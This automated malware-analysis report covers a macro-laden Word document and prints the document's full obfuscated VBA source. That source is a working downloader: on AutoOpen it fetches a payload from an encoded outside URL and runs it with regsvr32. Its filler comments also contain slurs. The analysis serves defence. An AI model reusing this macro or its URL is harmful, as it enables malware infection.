Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d506a7e911125249…

MALICIOUS

Office (OOXML)

93.3 KB Created: 2020-05-22 11:37:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-07-24
MD5: c20c9b35bb637f123e13d76b9856be94 SHA-1: b5d2640247e6ef9424741cf2cfd47f9b837f252a SHA-256: d506a7e9111252495ae25542a3dcc2d0a142447e2499b191bd76098f0f32859c
310 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing a VBA macro. The macro is obfuscated and uses the AutoOpen function to execute. It leverages URLDownloadToFile to download a second-stage payload, indicating an Ingress Tool Transfer attack pattern. The presence of obfuscated auto-exec VBA with execution sinks strongly suggests malicious intent.

Heuristics 7

  • ClamAV: Doc.Malware.Generic-7898874-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-7898874-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 And Win64 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" ( _
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    ' Sport citysearch ova ex
    C.Rv "regsvr32 " + j(1)
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • http://ns.adobe.com/xap/1.0/Referenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
    • http://ns.adobe.com/xap/1.0/mm/Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://ns.adobe.com/photoshop/1.0/Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 21057 bytes
SHA-256: 032aeeaa182fed19470310c1de24da7f2a2d5f0f6c466dac256e1e318308a37e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cO"
Function ky(E)

' Celibate andalusia courtship paypal efficient
' Ind. advice omnipotent
' Ticking constituency

' Carcass swerve
' Towns spine incumbent shrew
' Fantastic baal untamed

' Dinghy turnip apache jewess
' Coax northeast algorithms ope burlesque pageant lesbian
' Diffident eau footnote
'
' Tradesman lighthouse
' Workroom crash adhere
' Ride inert nut america assumption
'
' Temperamental mj terminals
' Indicates
' Influenza stringent psychiatry begun

' Assessment frontpage medications analytical
' Pranks superlative butte
' Bakery desperado pedagogue hickory

' Trainer wav props labrador echo
' Holders mph
' Appalled containing caught monsoon
'
' Vitriol pers direction
' Creatures
' Sophisticated special
' Lithe hubbub quartermaster demands succulent
'
' Patent profaned boost
' Function death
' Vestal
'
' Democratic scum
' Shaved sprout
' Lethe commemoration gushing
' Tile airlines
' Incest xx appearing
'
' Surrey intl austria bologna disconcert buf
' Hundred receiver compaq
' Forget tho locally
' Writer roller miniature commitment proffer
' Dance

' Bowled
' Aspen enjoyable carol
' Measurement millinery
'
' Develop essay cinnamon ethiopia
' Gabriel compounds sluts comprehensible
' Echo monaco
' Thereby modulation
' Approval mater sepulchral genealogy

' Slav forced received
' Digital democrats substitute adds employer agnostic
' Trice differences attended dd
End Function
Function qb()

' Mails maize manufacturer negligible aspen
' Patter vs contamination bump
' Three engineering nutriment shameless tenet dictatorial

' Allegorical shrub babel ru
' Tournament jo. therapy
' Indirect reopen
' Favourite apostasy dyspepsia locked relating
' Ins archives
' Wildcat allen greater sweet
' Shooting cross-examination subway adam springer

' Underfoot coupling amsterdam vomit
' Celebration
' Tasty tonnage traveler impartiality
' Giants
' Ottoman

' Lips century live
' Infect nylon climate mixer precursor war dragons
' Antiquary oem dive undress edgar assimilating methodology
' Dont cell columns coasting

' Clan
' Magpie janet

' Partnerships beautifully announces swerve
' Watershed pendant donor normans

' Enquiries harass
' Transgressor
' Press epidermis kangaroo wanted newborn
' Seattle panther
' Mobile memory catacombs scandinavian comic
' Shops

' Suites hr
' Dover hopefully asset
' Sanitary

' Paste tomahawk follows plash
' Lancet chop phalanx
' Helps dating invalid advances blatant
End Function
Function j(FK)

' Dryer
' Desultory
' Dint outline fatherland athletics
Dim x1(0 To 222)
' Lawfully coupon benighted bradford
' Scenic keyboard quizzical italia
' Awe-inspiring treble causes
' Packing caring ut bradley crucifix arbitration
x1(0) = Trim("hb1tb1tb")
' Tolerance reinforcement harmony prototype ge
' Serpentine wage sixty-two forth fraternity
x1(1) = Trim("1pb1:b1/")
' Dervish whitehall ns insignia
' Initiatives
x1(2) = Trim("b1/b1wb1")
' Vixen unfold unobtrusive losses
' Marketplace schools
x1(3) = Trim("wb1wb1.b")
' Prague refurbished needing eaves astride
' Carl
' Latticed auburn retreat
' Jackson resolved expiring
' Wrangle buoyant humidity
x1(4) = Trim("1wb1ib1l")
' Animate lusitania fs
' Versification pcs reproduction depreciate omelette ebook
' Impetus horus ire worried
x1(5) = Trim("b1lb1sb1")
' Lustful craters forecast metaphor gibberish
' Amanda baltimore voluble opposed arsenal
' Statuary males
' Speaks snowball
x1(6) = Trim("tb1eb1rb")
' Geographically jagged interactive
' Immunology joyce performance harmful vicissitudes thimble
x1(7) = Trim("1nb1sb1.")
' Furthermore giant cb
' Remix pitch accept curving
' Viagra
' Measuring morris sepulchre morrison stumped azalea
' Conduit dissipation assign clocks
x1(8) = Trim("b1cb1ob1")
' Pater broach
' Transcripts jumping olfactory magnanimously fails
x1(9) = Trim("mb1/b1wb")
' Spice
' Findlaw malevolent uphold minneapolis
x1(10) = Trim("1pb1-b1c")
' Lard transmutation batch ic
' Dos circumlocution
x1(11) = Trim("b1ob1nb1")
' Valueless
' District baptize applicants pout focus
' Guild trans
' Farming independently bothered accomplishing
x1(12) = Trim("tb1eb1nb")
' Html fuji
' Moon armenia bahia trips exhibitions
x1(13) = Trim("1tb1/b1p")
' Creature canister consistence skepticism
' Thor annul torpedoes prozac
' Adhesive
' Spouting
x1(14) = Trim("b1lb1ub1")
' Bc spouse tapioca wave
' Clink snore feed
' Min admiralty
' Default purchase winder unbalanced drivers
x1(15) = Trim("gb1ib1nb")
' Operate midwinter
' Virginity cede fiasco
x1(16) = Trim("1sb1/b1s")
' Abyssinian anderson potato
' Insulin madeira maltese advertisers
' Accommodate erotic loveless
' Picked miss bard
x1(17) = Trim("b1hb1eb1")
' Reader laudable
' Pokemon monica guitar
' Behavioral bewildering
x1(18) = Trim("eb1tb1-b")
' Taylor amp gnarled selective
' Released
' Personals integer fever
' Dowager juniper befriend sedan nonsensical
x1(19) = Trim("1mb1ub1s")
' Profuse
' And lobby ed dna palanquin
' Warehouse beliefs
' Exhaust crescendo
' Beckon
x1(20) = Trim("b1ib1cb1")
' Braxton merit accosted grounds
' Improvident hostel stratified
' Isle canberra
' Windfall session
' Outreach da pulley fingering
' Hurtful girls bayonet nearby
x1(21) = Trim("-b1lb1ib")
' Dysentery theoretic warner
' Allocation dole connection muhammad luis
' Filter assessment pours paperback house
x1(22) = Trim("1bb1rb1a")
' Sacrifice ninety-nine minneapolis fraction gig milkman settee
' Somerset completing premises
' Technician lot muffler markers gran sonnet
' Tress clocks
' Combo retrace
x1(23) = Trim("b1rb1yb1")
' Youthfulness disapproval vacations paraphrase
' Samoa vhs sulkily larch comeliness
' Inconsolable coding declared testimonials
' Forward fossil
' Behind archives christina ottawa outpost
x1(24) = Trim("/b1_b11b")
' Creation
' Collar talent appertain adsl
' Waxing ste. decease calcareous billow
' Cat milkman
x1(25) = Trim("1Ob14b1p")
' Wheedle herb pertain debt sambo
' Axiom continued brutish wizened excel billet
' Punjab himalayas myself geology simon
x1(26) = Trim("b1Ub1mb1")
' Cox precipitately acetylene gratuitous hustle
x1(27) = Trim("Zb10b1Rb")
' Hartford stones
' Epson
' Burrow antediluvian acknowledgement fiddling
x1(28) = Trim("13b1xb1K")
' Franchise lender tottering ascendancy
' Jobs wayward discard
' Lead diagonal silurian undergraduate
' Deuteronomy mug carbide
' Differently hear
' Navigate organizing oracular
' Loops prove martial
x1(29) = Trim("b1hb1kb1")
' Logo pictures
' Defend blackguard pebble retracted
x1(30) = Trim("Lb1fb1.b")
' Credible cuba tandem
' Cinnamon
' Shop
' End eocene administrators
' Plaintiff unrequited dike honduras
x1(31) = Trim("1pb1hb1p")
' Richardson journals with recurrence
x1(32) = Trim("b1?b1xb1")
' Select minds arthritis coalition ace german
' Braggart karl silicon accredited radios zigzag
' William celt
' Iceland
' Pessimistic
x1(33) = Trim("=b1Mb1Db")
' Regenerate nether seen
' Hiring commitments consequence
x1(34) = Trim("1Ab1wb1M")
' Southeast skills submissive collection respiratory
x1(35) = Trim("b1Cb1Db1")
' Moon prevention grades gabble
' Away punic eileen peppermint
x1(36) = Trim("kb1Ub1Ub")
' Containing
' Russet cord sister
' Proffer happiness fundamentally preferences
' Conservative froward stench
' Watch colder gasoline
x1(37) = Trim("1Hb1Nb14")
' Drinking buildings adult delectation
' Thanksgiving security botanist effrontery
' Elapse rear rider unpropitious xl
' Graph division gad treat
' Aberdeen tar contract michigan privacy depth
' Opening graduation effectively
x1(38) = Trim("b1-b1jb1")
' Civilian yn partook
' Anymore calvinist guide
x1(39) = Trim("Cb1eb1pb")
' Youngster brocade
' Wanna belated quantities match redound entirety
' Conversion hertfordshire
' Scaly crony measurements
' Sat barriers generally diana pledge
x1(40) = Trim("1lb15b1I")
' Sedentary tv concierge riding
' Badge earnings fatalism
' Goals gates butchers ports oscillation
' Purplish flirt assistant imagine rp
x1(41) = Trim("b1Ab1fb1")
' Hawthorn
x1(42) = Trim("yb1ib1Ob")
' Year microwave polish
' Ordination dale duchy thrive
' Machinery harpoon
' Underhand fondle
x1(43) = Trim("1gb1Hb12")
' Bret intercept experimenting offensive
' Bang height leading beatles calcium mislead boating
' Whose remedies back
' Intuitive avoidance translation
x1(44) = Trim("b1Wb1db1")
' Dido
x1(45) = Trim("zb1sb1Rb")
' Kingston excess byte relevant
' Capture
' Thirty-seven carry
x1(46) = Trim("17b1Jb1r")
' Stilts intentional comparative survival
x1(47) = Trim("b1Qb1kb1")
' Supplemental beta probe impersonal
' Incident sculpture follow selective shave
' Optional
x1(48) = Trim("Pb1Lb1Yb")
' Puerto dam permissions conclude cockney touchstone
x1(49) = Trim("1zb1jb1v")
' Anyone fleece abstemious loves
' Assure shingle fly
' Malachi wrestle
' Passer tuner
' Feed shrimp
x1(50) = Trim("b1Fb1ub1")
' Marketplace liked entities buying
' Bellow laymen wuss beginners
' Rig wort thereby preventing emancipate resort
' Abounded answering they departmental declared bedraggled
' Toner encyclopedia
' Propagating shield lesbians celebrate wold
x1(51) = Trim("Pb1ib1zb")
' Cia
' Browse mon irremediable
' Clown outspoken tools
' Places
' Abaft ferry
x1(52) = Trim("1cb1Ub16")
' Provincial mashed powder
' Pole bmw census boxing
' Blacken multimedia genuine scaly dat
x1(53) = Trim("b1yb1tb1")
' Cylindrical creates merger smoldering
' Menus
' Point scowl measured urban figured harmed christine
' Broods stanley
x1(54) = Trim("lb1gb1ib")
' Vertex coordinated vulnerability grenadier
x1(55) = Trim("1vb1Xb1W")
' Subjects turpentine a- workforce
' Peterborough
' Volleyball bearable matrix cave smock
' Wasp burglary dido woolly jesse
' Xerxes viands bacterial temperature
' Impropriety scrip generator tamper thereunto helter-skelter
x1(56) = Trim("b1Zb15b1")
' Recipient canal gel
' Snore received roguish
' Bicycle porter auctioneer
' Street sis realm
' Rampart pass jubilant niggers
' Shack steadfastness decadence
x1(57) = Trim("Tb1rb1rb")
' Leaven convocation strengths
x1(58) = Trim("16b1Lb1A")
' Supreme inconsiderate unopened disorderly sappho
' Array kangaroo
x1(59) = Trim("b14b13b1")
' Odium
' Dearth design
x1(60) = Trim("Nb13b1Lb")
' Hose
' Lothario housing flaccid lip loading capabilities
' Corp visible tulip indiscreet brent
' Hospitals evident accepts sleeping
' Encumbrance lather absolve
' Shorn rely
x1(61) = Trim("1Rb1eb1w")
' Bank js requesting
' Can tucson
' Targets unlettered faqs proficient
' Depreciate magnitude absolutism
x1(62) = Trim("b11b1ib1")
' Distillation coffee garlic labour starring
' Cartoons aria quince optimize cooked
' Driver furthermore
x1(63) = Trim("6b1eb1bb")
' Representatives producers norm colder
' Duo permission sydney ancient
' Proceedings deficit teresa
x1(64) = Trim("1mb10b1t")
' Malevolent mischance far-fetched baseness
' Sluggard non pomegranate
' Minus
' Soul
' Intertwined cadet pliable livesex
' Disillusion mote endearment
x1(65) = Trim("b10b1Zb1")
' Rolf
' Accumulating taylor fallacious plain
' Asked tatiana lewd happiness avow calabash
x1(66) = Trim("Hb1vb1Ob")
' Knead cosmetic heifer
' Nickname imposes varied emporium
' Esplanade tunisia quietude unyielding warrior
' Johnny crown functionality rhea sean notebook
' Thankless imposed depot
x1(67) = Trim("1Ub1cb1M")
' Asthma ordering mammon sixty-three
' Uninformed solutions timorous
x1(68) = Trim("b1yb1lb1")
' To fy unofficial worm
' Conviction scabbard sam itinerant
' Recorder
x1(69) = Trim("Mb1wb19b")
' Carrying pinnacle georgie utilize remained
' Currency uninterested
' Keenness
x1(70) = Trim("1Ib1Nb1D")
' Repartee key
' Cargo
' Marketing transportation
x1(71) = Trim("b1ab1yb1")
' Renunciation beside ruff river
' Luck
' Identification tennis oc programmers
x1(72) = Trim("Lb1ab17b")
' Seafood checked
' Spice plume hammer
' Sod procedures sacred
' Taxation yard standings abolitionist
x1(73) = Trim("1lb1Eb1T")
' Beaches regular sniff
' Cluster handbags things optic calvin
' Gg interrogatory rouge
' Tsp erotica intel
' Humans dimensional languish
' Valuable transsexual sticky wheres totally
x1(74) = Trim("b1yb10b1")
' Emission prig mink
' Millions conservation
' Disaffected slovenia modified mesopotamia vault
' Madder mauve carrying orlando focus
' Awesome cheats
x1(75) = Trim("6b1-b10b")
' Funding epidermis distance hoar budget zdnet yukon
' Happens exist runaway candlestick costs
' Humans wholl wall
' Grocer palanquin subsequent inquiries
x1(76) = Trim("16b1_b1f")
' Kathy
' Restitution mph
' Ave reprimand lire
x1(77) = Trim("b1pb1jb1")
' Counts breeding son rail derek
' Periodic comparable copenhagen
' Cranium
x1(78) = Trim("ib1Ob1Ab")
' Dis assassinate kuwait
' Knife handle rebate trigger
' Hc shale incorporate patch
' Imperial search
x1(79) = Trim("1wb1Gb1B")
' Hermitage exchange
' Sleeps solaris ply overcrowded
' Harmonic stone vex immaculate
x1(80) = Trim("b1Zb1gb1")
' Sea bring armenian tattoo dear
' Notice javascript flying vernon sorcery
' Supervisor rates
' Harmful instigator saves hike
x1(81) = Trim("3b12b1ib")
' Awarded variable ibrahim
' Tb
' Cortege gross
' Epithet hitting incorporate underworld
' Crape nimble barrow posting divergent
' Kissing copyright seafood
' Ps. immobile plaintiff propitious
x1(82) = Trim("1vb1ib1d")
' Aerial hives
' Broil punctilious flurry
' Permanent station
' Enigmatical hitachi trance
x1(83) = Trim("b1rb1Sb1")
' Forgery meaning distortion cruises waitress inscrutable
' Tripod camp adder mercurial butchers enrollment
' Practices in- coiled
x1(84) = Trim("Wb1Cb1Zb")
' Hiring consortium tenderfoot poll
' Digit incisive bestowal our
' Mischance wmo perspective
x1(85) = Trim("16b15b1e")
' Resists
' Britannica
' Estonia proffer median
' Examinations
x1(86) = Trim("b17b1Wb1")
' Commented oil diplomat uplift
x1(87) = Trim("kb1ib1Yb")
' Electorate methodical boobs exalts mls
' Labor bishop tunis jessica page
' Brabant marl
x1(88) = Trim("1ab1Ab1w")
' Rx phrygian objects hyundai
' Lecturer abolish con decade latitude
' Raised recycling hussy
x1(89) = Trim("b1Wb18b1")
' Assume prettier invocation passenger belts penis colombo
' Babylonian milfhunter consensus spreading
' Sepulchral ace avaricious aflame
' Harvard uncertainty suns coined
' Refutation moi
' Pedestal thousandth fool
x1(90) = Trim("ob1xb14b")
' Mechanisms
' Relay revision repentant remnants carefully presentations fm
' Basement plentifully loft
' Controlling
x1(91) = Trim("1vb13b1u")
' Copying condition digit
x1(92) = Trim("b1Rb1Tb1")
' Fewest vt oughtnt
x1(93) = Trim("7b1Yb1tb")
' Ostracism suzerainty anomaly affluent apartments cones
' Arrive
' Wallow oe languages iron
' Expiration modifies nec
' Understood
x1(94) = Trim("1vb1Kb1Q")
' Unripe march
' Temperamental arid undergraduate
' Incompatible leslie abelard
' Dazzle mats incoherent concubine
' Urgency ashley
x1(95) = Trim("b1jb13b1")
' Dance subdivision mx erik pure colossus
' Compatible hoot evaporate hire
' Pest ahmed
x1(96) = Trim("-b1Gb1Nb")
' Disaffected telecommunications disaster hood consultants
' Examiner qualification cinders symbols recommends abdul slammed
' Cnn italia
' Bestsellers left
x1(97) = Trim("1hb13b1q")
' Disabled diluted
' Developmental ochre lineage
' Lambda jocund apes requested casey
' Scales mecca chemical
x1(98) = Trim("b1bb1Mb1")
' Rear-guard southampton
' Nurture
' Diffusion parsley franc
' Sexually scheduled tissue method
' Splitting tongs reindeer skins
' Bentley none
' South seaweed sort wuss
x1(99) = Trim("~b1%b1%b")
' Pup abraham exhibit titten
' Brandishing michelle coleman
x1(100) = Trim("1%b1cb1:")
' Swivel sponsor mid quito canal
' Flagon suburban geologist infrastructure habitat sullied
' Tomorrow moth legislator
' Migration amicably hyacinth
' Shackles indonesia centered
x1(101) = Trim("b1\b1pb1")
' Rocket zenith conservative
x1(102) = Trim("rb1ob1gb")
' Only publication decrease notre
' Shaw broad ceres
' Mixed friesland swing friend drivers
x1(103) = Trim("1rb1ab1m")
' Stories kine loki carbine
' Continually
' Infinite dealt modicum saliva
x1(104) = Trim("b1db1ab1")
' Overdue
' Gram mountain catering
' Peak km
' Expired academical tigers
' Manner discrepancy
' Relation storey alt watson fairly
' Mentor
x1(105) = Trim("tb1ab1\b")
' Infest indicator pedestrian cams
' Dangerous humidity
' Capitol demented double three-quarter
' Alias portland detestation dresser
x1(106) = Trim("13b16b15")
' Harmonize ladies rental preferences cable harboured logistics
' Mortgage
' Thrown gig teresa
' Epa uzbekistan
' Dropped silhouette
' Strand personal wy
' Coy montana
x1(107) = Trim("b18b16b1")
' Lumpy arrived
' Compute infirm mc wasteful arian
' Sleigh
x1(108) = Trim("9b11b15b")
' Storm trieste lettuce knoll cocoa
' Navajo garage delays
' Announce workshop les arbiter
x1(109) = Trim("1.b1db1a")
' Vibrate wallet siren ka attractions
' Processors claret
' Saturn portfolio
x1(110) = Trim("b1tb1")

' Temporary outdoors define arcade
' Precipitous seeker item almanac casino
' Minion hs
Vc = Join(x1, "")

' Tapioca holdings butch healer
' Comp
' Perpetrator reception
' Parking dalliance burthen
Vc = Replace(Vc, "b1", "")

' Spike evil simpsons compares
' Tripe numeric emphasis enamoured
' Exceptionally
' Jr vedic watt
sT = Split(Vc, "%%%")

' Constitutes embedded
' Self-made pickpocket difficulty kids
' Discounted crescent winner
' Asylum fictitious major-domo monroe curvature
Select Case FK
Case 0
j = sT(0)
Case 1
j = sT(1)
Case Else
Debug.Print "Vc"
End Select
End Function
Sub AutoOpen()

' Rigor cord educator
' Pb trevor attempted falstaff
' Comma
Dim ya As New k7

' Hunt michelle operates epson extraordinary
' Variations scotia logic supernumerary bra
' Replacing burke
' Towns fiddler sensitive
' Seems qualm demented rehearse waters faggot
ya.O j(0), j(1)

' Facilitate meekness
' Convulsive shed solo daze
' Auditory lapel beats recurrence endangered witnesses
' Internship twiki
Dim C As New PZ

' Receipt bleached
' Nam addicted departmental payroll

' Items brewery
' Evening portico amend
' Zone orgy
' Une deadening mass product long
' Perfume

' Cincinnati

' Xi clearance rotund vic
' Exploitation sitting city abby inquire
' Sport citysearch ova ex
C.Rv "regsvr32 " + j(1)
End Sub

Attribute VB_Name = "k7"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Private Sub Class_Initialize()

' Probability quiescent racks employer
' Taper slander providers flaw
' Law-abiding producers cu
' Premium stamps submitted
' Elapse wally nebraska nicaragua
End Sub
Private Sub Class_Terminate()

' Designated liechtenstein newsletters
' Experiences porpoise supervise
End Sub
Public Function O(T, L6)

' Framing append grove tyrannical exportation
' Amanda
' Dandy generally frozen connecticut
' Cruising gourd
w = URLDownloadToFile(0&, T, L6, 0&, 0&)
End Function

Attribute VB_Name = "PZ"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Rv(q)

' Cd
' Situations breton hand
Dim UA As New WshShell
UA.exec q
End Function
Function F(tm)
    
' Double-barrelled free childhood rob
' Brands archipelago talkative
' Bedtime
' Venice capacious diploma
' Prefatory

' Constitutional bean
' Eyes
' Twine slanderous th forceps guy anglo-indian
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 64512 bytes
SHA-256: fc3fe10c06692727ed449ad72bdcd2c62375de11a3ade973607ca0a153ae7b1e
Detection
ClamAV: Doc.Malware.Generic-7898874-0
Obfuscation or payload: unlikely